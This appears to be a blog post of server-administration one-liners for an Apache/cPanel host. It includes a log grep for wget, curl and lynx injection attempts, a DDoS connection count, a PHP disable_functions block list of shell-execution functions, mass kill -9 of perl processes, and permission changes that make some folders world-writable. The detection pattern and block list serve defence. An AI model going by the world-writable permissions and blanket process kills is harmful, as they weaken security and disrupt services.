The following command should aid you in isolating which
site was responsible for this injection:
find /usr/local/apache/domlogs/ -exec egrep -H '(wget|curl|lynx|wget)%20' {} \;
========================================================
A quick and usefull command for checking if a server is under ddos is:
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
lynx -dump http://127.0.0.1/whm-server-status
That will list the IPs taking the most amount of connections to a server.
=========================================================
Forwarding thru index page:----
==========================================================
to kill perl processess;-
ps auxww | grep perl | awk '{print $2}' | xargs kill -9
===========================================================
ssh root@192.168.0.12 'mkdir ~/.koithar;echo '`cat ~/.ssh/id_dsa.pub`' >> ~/.koithar/authorized_keys'
grep -lir "some text" * ------> to find a text in a file
=========================================================
find . -name "*.php" -exec chmod 644 {} \;
find . -name "config*.php" -exec chmod a-w {} \;
find . -name "*" -type d -exec chmod 755 {} \;
find . -name "images" -type d -exec chmod a+rxw {} \;
find . -name "thumbnails" -type d -exec chmod a+rxw {} \;
=========================================================
disable_functions =
system,system_exec,shell,shell_exec,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source
=========================================================
rpm -qa | grep -i
'yp-tools\|ypbind\|ypserv\|redhat-config\|samba\|cups\|electric\|doxyge\|gmp-dev'
No comments:
Post a Comment